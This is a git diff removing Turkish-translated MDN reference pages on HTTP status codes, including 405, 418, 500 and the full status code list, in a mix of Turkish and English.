Web/HTTP/Status/405 -tags: - - Durum kodu -translation_of: Web/HTTP/Status/405 ---- -<div>{{HTTPSidebar}}</div> - -<p>HyperText Transfer Protocol (HTTP) <code><strong>405 Method Not Allowed</strong></code> durum kodu sunucunun istek metodunu bilmesine rağmen istenen kaynak tarafından metodun desteklenmediği anlamına gelir.</p> - -<p class="newpage">Sunucu MUTLAKA <strong><code>Allow</code></strong> başlığı ile istenen kaynağın şu an desteklediği metotları listeleyen bir 405 cevabı vermelidir.</p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox notranslate">405 Method Not Allowed</pre> - -<h2 id="Detaylar">Detaylar</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "405 Method Not Allowed" , "6.5.5")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Allow")}}</li> - <li><a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" rel="noopener">HTTP/1.1: Status Code Definitions</a></li> - <li><a href="https://kinsta.com/blog/405-method-not-allowed-error/">How to Fix 405 Method Not Allowed</a></li> - <li><a href="https://docs.microsoft.com/en-us/aspnet/web-api/overview/testing-and-debugging/troubleshooting-http-405-errors-after-publishing-web-api-applications">Troubleshooting HTTP 405</a></li> -</ul> diff --git a/files/tr/web/http/status/418/index.html b/files/tr/web/http/status/418/index.html deleted file mode 100644 index 14ec22a3aa..0000000000 --- a/files/tr/web/http/status/418/index.html +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: 418 Ben Çaydanlığım -slug: Web/HTTP/Status/418 -translation_of: Web/HTTP/Status/418 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HTTP <strong><code>418 I'm a teapot</code></strong> client error response code indicates that the server refuses to brew coffee because it is, permanently, a teapot. A combined coffee/tea pot that is temporarily out of coffee should instead return 503. This error is a reference to Hyper Text Coffee Pot Control Protocol defined in April Fools' jokes in 1998 and 2014.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">418 I'm a teapot</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("2324", "418 I'm a teapot" , "2.3.2")}}</td> - <td>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0): Semantics and Content</td> - </tr> - <tr> - <td>{{RFC("7168", "418 I'm a teapot" , "2.3.3")}}</td> - <td>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA): Response Codes</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.418")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{interwiki("wikipedia", "Hyper Text Coffee Pot Control Protocol", "Wikipedia: Hyper Text Coffee Pot Control Protocol")}}</li> -</ul> diff --git a/files/tr/web/http/status/500/index.html b/files/tr/web/http/status/500/index.html deleted file mode 100644 index 30f4e0fa77..0000000000 --- a/files/tr/web/http/status/500/index.html +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: 500 İç Sunucu Hatası -slug: Web/HTTP/Status/500 -tags: - - Durum kodu - - HTTP - - Sunucu hatası -translation_of: Web/HTTP/Status/500 ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP <code><strong>500 İç Sunucu Hatası</strong></code> <span id="result_box" lang="tr"><span>sunucu hata yanıt kodu, sunucunun isteği yerine getirmesini engelleyen beklenmedik bir durumla karşılaştığını gösterir.</span></span></p> - -<p><span id="result_box" lang="tr"><span>Bu hata yanıtı genel bir "tümünü yakalama" yanıtıdır.</span> <span>Çoğu zaman sunucu yöneticileri, hatanın gelecekte tekrar oluşmasını önlemek için 500 durum kodu gibi hata yanıtlarını günlüğe kaydederler.</span></span></p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox">500 İç Sunucu Hatası</pre> - -<h2 id="Tanımlar">Tanımlar</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Tanım</th> - <th scope="col">Başlık</th> - </tr> - <tr> - <td>{{RFC("7231", "500 Internal Server Error" , "6.6.1")}}</td> - <td>Köprü Metni Aktarım Protokolü (HTTP / 1.1): Anlambilim ve İçerik</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.500")}}</p> diff --git a/files/tr/web/http/status/index.html b/files/tr/web/http/status/index.html deleted file mode 100644 index 68c768ecc5..0000000000 --- a/files/tr/web/http/status/index.html +++ /dev/null @@ -1,193 +0,0 @@ ---- -title: HTTP yanıt durumu kodları -slug: Web/HTTP/Status -tags: - - HTTP - - NeedsTranslation - - Status codes - - TopicStub -translation_of: Web/HTTP/Status ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP yanıt durumu kodları belirli bir <a href="/tr/docs/Web/HTTP">HTTP</a> isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtları beş sınıfa ayrılır:<br> - <br> - 1. Bilgilendirme yanıtları (100-199),<br> - 2. Başarı yanıtları (200-299),<br> - 3. Yönlendirmeler (300-399),<br> - 4. İstemci hataları (400-499) ve,<br> - 5. Sunucu hataları (500-599).</p> - -<p>Durum kodları<a href="https://tools.ietf.org/html/rfc2616#section-10"> RFC 2616 bölüm 10</a>'da tanımlanmıştır. Güncellenmiş bir özelliği <a href="https://tools.ietf.org/html/rfc7231#section-6.5.1">RFC 7231</a>'de bulabilirsiniz.</p> - -<div class="blockIndicator note"> -<p>Bu listede olmayan bir yanıt alırsanız, bu, muhtemelen sunucunun yazılımına özel, standart dışı bir yanıttır.</p> - -<p>Cevaplar (İngilizce) Orjinal olarak döndürüleceğinden - cevabın Türkçesi yanında verilmiştir. </p> -</div> - -<h2 id="Bilgilendirme_yanıtları">Bilgilendirme yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(100, "100 Continue")}} - "100 Devam et"</dt> - <dd>Bu ara cevap, şu ana kadar her şeyin yolunda gittiğini ve müşterinin isteğine devam etmesi ya da bitmişse bu bilgiyi yoksayması gerektiğini gösterir.</dd> - <dt>{{HTTPStatus(101, "101 101 Switching Protocol")}} - "101 Protokol Değiştiriliyor"</dt> - <dd>Bu kod istemci tarafından gönderilen istekteki {{HTTPHeader("Upgrade")}} başlığına yanıt olarak gönderilir ve sunucunun hangi protokole geçtiğini belirtir.</dd> - <dt>{{HTTPStatus(102, "102 Processing")}} ({{Glossary("WebDAV")}}) - "102 İşleniyor" - Sözlük("WebDAV") </dt> - <dd>Bu kod sunucunun isteği aldığını ve işlemekte olduğunu ancak henüz yanıt vermediğini bildirir.<br> - <strong>WebDAV(Web Distributed Authoring and Versioning</strong><strong>):</strong> World Wide Web sunucularında depolanmış belge ve dosyaları düzenleme ve yönetmede kullanıcılar arasında iş birliğini kolaylaştıran bir Hiper Metin Aktarım Protokolü uzantısıdır.</dd> - <dt>{{HTTPStatus(103, "103 Early Hints")}} -"103 Ön İpucu"</dt> - <dd>Bu durum kodunun esas olarak {{HTTPHeader ("Link")}} başlığıyla kullanılması amaçlanmıştır ve sunucu bir yanıt hazırlarken kullanıcı aracısının kaynakları <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTML/Preloading_content">önyüklemeye</a> başlamasını sağlar.</dd> -</dl> - -<h2 id="Başarı_yanıtları">Başarı yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(200, "200 Tamam")}}</dt> - <dd>İstek başarılı oldu. Buradaki başarı, HTTP metoduna göre farklı anlamlara gelir:<br> - GET: Kaynak alındı ve mesaj gövdesinde iletildi.<br> - HEAD: Varlık başlıkları mesaj gövdesindedir.<br> - PUT veya POST: Eylemin sonucunu açıklayan kaynak mesaj gövdesinde iletildi.<br> - TRACE: Mesaj gövdesinde sunucu tarafından alındığı şekliyle istek mesajı bulunuyor.</dd> - <dt>{{HTTPStatus(201, "201 Oluşturuldu")}}</dt> - <dd>"İstek başarılı oldu ve bunun sonucunda yeni bir kaynak oluşturuldu."<br> - Genellikle POST veya PUT isteklerinden sonra gönderilen yanıt budur.</dd> - <dt>{{HTTPStatus(202, "202 Kabul edildi")}}</dt> - <dd>"Talep alındı, ancak henüz işlem yapılmadı." HTTP'de daha sonra isteğin sonucunu belirten eşzamansız(asenkron) bir yanıt göndermenin bir yolu olmadığından, kesin değildir.<br> - 'Başka bir işlemin yapıldığı' veya<br> - 'Sunucunun isteği işlediği durumlar' için veya<br> - 'toplu işleme' yanıt olarak tasarlanmıştır.(toplu işleme: bir defada -bölünmeden- yapılacak işlem bloğu) </dd> - <dt>{{HTTPStatus(203, "203 Non-Authoritative Information")}} - "203 Yetkili Olmayan Bilgiler"-</dt> - <dd>Bu yanıt kodu, döndürülen meta bilginin, kaynak sunucudakiyle tam olarak aynı olmadığı, ancak yerel veya üçüncü taraf bir kopyadan toplandığı anlamına gelir. Bu özel durum haricinde, "200 OK" yanıtı tercih edilir.</dd> - <dt>{{HTTPStatus(204, "204 No Content")}} - "204 İçerik Yok"</dt> - <dd>Bu istek için gönderilecek içerik yok, ancak başlıklar faydalı olabilir. Kullanıcı aracısı, bu kaynak için önbelleğe alınmış başlıklarını yenileriyle güncelleyebilir.</dd> - <dt>{{HTTPStatus(205, "205 Reset Content")}} - "205 İçeriği Sıfırla"</dt> - <dd>Kullanıcı aracısına bu isteği gönderen belgeyi sıfırlamasını söyler.</dd> - <dt>{{HTTPStatus(206, "206 Partial Content")}} - "206 Kısmi İçerik"</dt> - <dd>This response code is used because of range header sent by the client to separate download into multiple streams.</dd> - <dt>{{HTTPStatus(207, "207 Multi-Status")}} ({{Glossary("WebDAV")}}) - "207 Birden fazla durum" - Sözlük("WebDAV") </dt> - <dd>Birden çok durum kodunun uygun olabileceği durumlar için birden çok kaynak hakkında bilgi aktarır.</dd> - <dt>{{HTTPStatus(208, "208 Already Reported")}} ({{Glossary("WebDAV")}}) - "208 Rapor edilmiş" - Sözlük("WebDAV") </dt> - <dd>Bir <code><dav:propstat></code> yanıt öğesinin içinde, birden çok bağlamanın dahili üyelerinin aynı koleksiyona tekrar tekrar numaralandırılmasını önlemek için kullanılır.</dd> - <dt>{{HTTPStatus(226, "226 IM Used")}} (<a href="https://tools.ietf.org/html/rfc3229">HTTP Delta şifrelemesi</a>) - "Kullanılmış IM Başlığı"</dt> - <dd>Sunucu, kaynak için bir <code>GET</code> isteğini yerine getirdi ve yanıt, geçerli örneğe uygulanan bir veya daha fazla örnek işlemenin sonucunun bir temsilidir.<br> - IM = <a href="https://tools.ietf.org/html/rfc3229#section-10.1">instance-manipulation</a> : örnek işleme</dd> -</dl> - -<h2 id="Yönlendirme_mesajları">Yönlendirme mesajları</h2> - -<dl> - <dt>{{HTTPStatus(300, "300 Multiple Choice")}}</dt> - <dd>The request has more than one possible responses. User-agent or user should choose one of them. There is no standardized way to choose one of the responses.</dd> - <dt>{{HTTPStatus(301, "301 Kalıcı Yönlendirme")}}</dt> - <dd>This response code means that URI of requested resource has been changed. Probably, new URI would be given in the response.</dd> - <dt>{{HTTPStatus(302, "302 Geçici Yönlendirme")}}</dt> - <dd>This response code means that URI of requested resource has been changed <em>temporarily</em>. New changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests.</dd> - <dt>{{HTTPStatus(303, "303 See Other")}}</dt> - <dd>Server sent this response to directing client to get requested resource to another URI with an GET request.</dd> - <dt>{{HTTPStatus(304, "304 Not Modified")}}</dt> - <dd>This is used for caching purposes. It is telling to client that response has not been modified. So, client can continue to use same cached version of response.</dd> - <dt><code>305 Use Proxy</code> {{deprecated_inline}}</dt> - <dd>Was defined in a previous version of the HTTP specification to indicate that a requested response must be accessed by a proxy. It has been deprecated due to security concerns regarding in-band configuration of a proxy.</dd> - <dt><code>306 unused</code></dt> - <dd>This response code is no longer used, it is just reserved currently. It was used in a previous version of the HTTP 1.1 specification.</dd> - <dt>{{HTTPStatus(307, "307 Temporary Redirect")}}</dt> - <dd>Server sent this response to directing client to get requested resource to another URI with same method that used prior request. This has the same semantic than the <code>302 Found</code> HTTP response code, with the exception that the user agent <em>must not</em> change the HTTP method used: if a <code>POST</code> was used in the first request, a <code>POST</code> must be used in the second request.</dd> - <dt>{{HTTPStatus(308, "308 Permanent Redirect")}}</dt> - <dd>This means that the resource is now permanently located at another URI, specified by the <code>Location:</code> HTTP Response header. This has the same semantics as the <code>301 Moved Permanently</code> HTTP response code, with the exception that the user agent <em>must not</em> change the HTTP method used: if a <code>POST</code> was used in the first request, a <code>POST</code> must be used in the second request.</dd> -</dl> - -<h2 id="İstemci_hatası_yanıtları">İstemci hatası yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(400, "400 Bad Request")}}</dt> - <dd>This response means that server could not understand the request due to invalid syntax.</dd> - <dt>{{HTTPStatus(401, "401 Unauthorized")}}</dt> - <dd>Although the HTTP standard specifies "unauthorized", semantically this response means "unauthenticated". That is, the client must authenticate itself to get the requested response.</dd> - <dt><code>402 Payment Required</code></dt> - <dd>This response code is reserved for future use. Initial aim for creating this code was using it for digital payment systems however this is not used currently.</dd> - <dt>{{HTTPStatus(403, "403 Forbidden")}}</dt> - <dd>The client does not have access rights to the content, i.e. they are unauthorized, so server is rejecting to give proper response. Unlike 401, the client's identity is known to the server.</dd> - <dt>{{HTTPStatus(404, "404 Not Found")}}</dt> - <dd>The server can not find requested resource. In the browser, this means the URL is not recognized. In an API, this can also mean that the endpoint is valid but the resource itself does not exist. Servers may also send this response instead of 403 to hide the existence of a resource from an unauthorized client. This response code is probably the most famous one due to its frequent occurence on the web.</dd> - <dt>{{HTTPStatus(405, "405 Method Not Allowed")}}</dt> - <dd>The request method is known by the server but has been disabled and cannot be used. For example, an API may forbid DELETE-ing a resource. The two mandatory methods, <code>GET</code> and <code>HEAD</code>, must never be disabled and should not return this error code.</dd> - <dt>{{HTTPStatus(406, "406 Not Acceptable")}}</dt> - <dd>This response is sent when the web server, after performing <a href="/en-US/docs/HTTP/Content_negotiation#Server-driven_negotiation">server-driven content negotiation</a>, doesn't find any content following the criteria given by the user agent.</dd> - <dt>{{HTTPStatus(407, "407 Proxy Authentication Required")}}</dt> - <dd>This is similar to 401 but authentication is needed to be done by a proxy.</dd> - <dt>{{HTTPStatus(408, "408 Request Timeout")}}</dt> - <dd>This response is sent on an idle connection by some servers, even without any previous request by the client. It means that the server would like to shut down this unused connection. This response is used much more since some browsers, like Chrome, Firefox 27+, or IE9, use HTTP pre-connection mechanisms to speed up surfing. Also note that some servers merely shut down the connection without sending this message.</dd> - <dt>{{HTTPStatus(409, "409 Conflict")}}</dt> - <dd>This response is sent when a request conflicts with the current state of the server.</dd> - <dt>{{HTTPStatus(410, "410 Gone")}}</dt> - <dd>This response would be sent when the requested content has been permenantly deleted from server, with no forwarding address. Clients are expected to remove their caches and links to the resource. The HTTP specification intends this status code to be used for "limited-time, promotional services". APIs should not feel compelled to indicate resources that have been deleted with this status code.</dd> - <dt>{{HTTPStatus(411, "411 Length Required")}}</dt> - <dd>Server rejected the request because the <code>Content-Length</code> header field is not defined and the server requires it.</dd> - <dt>{{HTTPStatus(412, "412 Precondition Failed")}}</dt> - <dd>The client has indicated preconditions in its headers which the server does not meet.</dd> - <dt>{{HTTPStatus(413, "413 Payload Too Large")}}</dt> - <dd>Request entity is larger than limits defined by server; the server might close the connection or return an <code>Retry-After</code> header field.</dd> - <dt>{{HTTPStatus(414, "414 URI Too Long")}}</dt> - <dd>The URI requested by the client is longer than the server is willing to interpret.</dd> - <dt>{{HTTPStatus(415, "415 Unsupported Media Type")}}</dt> - <dd>The media format of the requested data is not supported by the server, so the server is rejecting the request.</dd> - <dt>{{HTTPStatus(416, "416 Requested Range Not Satisfiable")}}</dt> - <dd>The range specified by the <code>Range</code> header field in the request can't be fulfilled; it's possible that the range is outside the size of the target URI's data.</dd> - <dt>{{HTTPStatus(417, "417 Expectation Failed")}}</dt> - <dd>This response code means the expectation indicated by the <code>Expect</code> request header field can't be met by the server.</dd> - <dt>{{HTTPStatus(418, "418 I'm a teapot")}}</dt> - <dd>The server refuses the attempt to brew coffee with a teapot.</dd> - <dt>{{HTTPStatus(421, "421 Misdirected Request")}}</dt> - <dd>The request was directed at a server that is not able to produce a response. This can be sent by a server that is not configured to produce responses for the combination of scheme and authority that are included in the request URI.</dd> - <dt>{{HTTPStatus(422, "422 Unprocessable Entity")}} ({{Glossary("WebDAV")}})</dt> - <dd>The request was well-formed but was unable to be followed due to semantic errors.</dd> - <dt>{{HTTPStatus(423, "423 Locked")}} ({{Glossary("WebDAV")}})</dt> - <dd>The resource that is being accessed is locked.</dd> - <dt>{{HTTPStatus(424, "424 Failed Dependency")}} ({{Glossary("WebDAV")}})</dt> - <dd>The request failed due to failure of a previous request.</dd> - <dt>{{HTTPStatus(426, "426 Upgrade Required")}}</dt> - <dd>The server refuses to perform the request using the current protocol but might be willing to do so after the client upgrades to a different protocol. The server sends an {{HTTPHeader("Upgrade")}} header in a 426 response to indicate the required protocol(s).</dd> - <dt>{{HTTPStatus(428, "428 Precondition Required")}}</dt> - <dd>The origin server requires the request to be conditional. Intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.</dd> - <dt>{{HTTPStatus(429, "429 Too Many Requests")}}</dt> - <dd>The user has sent too many requests in a given amount of time ("rate limiting").</dd> - <dt>{{HTTPStatus(431, "431 Request Header Fields Too Large")}}</dt> - <dd>The server is unwilling to process the request because its header fields are too large. The request MAY be resubmitted after reducing the size of the request header fields.</dd> - <dt>{{HTTPStatus(451, "451 Unavailable For Legal Reasons")}}</dt> - <dd>The user requests an illegal resource, such as a web page censored by a government.</dd> -</dl> - -<h2 id="Sunucu_hatası_yanıtları">Sunucu hatası yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(500, "500 Internal Server Error")}}</dt> - <dd>The server has encountered a situation it doesn't know how to handle.</dd> - <dt>{{HTTPStatus(501, "501 Not Implemented")}}</dt> - <dd>The request method is not supported by the server and cannot be handled. The only methods that servers are required to support (and therefore that must not return this code) are <code>GET</code> and <code>HEAD</code>.</dd> - <dt>{{HTTPStatus(502, "502 Bad Gateway")}}</dt> - <dd>This error response means that the server, while working as a gateway to get a response needed to handle the request, got an invalid response.</dd> - <dt>{{HTTPStatus(503, "503 Service Unavailable")}}</dt> - <dd>The server is not ready to handle the request. Common causes are a server that is down for maintenance or that is overloaded. Note that together with this response, a user-friendly page explaining the problem should be sent. This responses should be used for temporary conditions and the <code>Retry-After:</code> HTTP header should, if possible, contain the estimated time before the recovery of the service. The webmaster must also take care about the caching-related headers that are sent along with this response, as these temporary condition responses should usually not be cached.</dd> - <dt>{{HTTPStatus(504, "504 Gateway Timeout")}}</dt> - <dd>This error response is given when the server is acting as a gateway and cannot get a response in time.</dd> - <dt>{{HTTPStatus(505, "505 HTTP Version Not Supported")}}</dt> - <dd>The HTTP version used in the request is not supported by the server.</dd> - <dt>{{HTTPStatus(506, "506 Variant Also Negotiates")}}</dt> - <dd>The server has an internal configuration error: transparent content negotiation for the request results in a circular reference.</dd> - <dt>{{HTTPStatus(507, "507 Insufficient Storage")}}</dt> - <dd>The server has an internal configuration error: the chosen variant resource is configured to engage in transparent content negotiation itself, and is therefore not a proper end point in the negotiation process.</dd> - <dt>{{HTTPStatus(508, "508 Loop Detected")}} ({{Glossary("WebDAV")}})</dt> - <dd>The server detected an infinite loop while processing the request.</dd> - <dt>{{HTTPStatus(510, "510 Not Extended")}}</dt> - <dd>Further extensions to the request are required for the server to fulfill it.</dd> - <dt>{{HTTPStatus(511, "511 Network Authentication Required")}}</dt> - <dd>The 511 status code indicates that the client needs to authenticate to gain network access.</dd> -</dl> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">List of HTTP status codes on Wikipedia</a></li> - <li><a href="http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml">IANA official registry of HTTP status codes</a></li> -</ul> |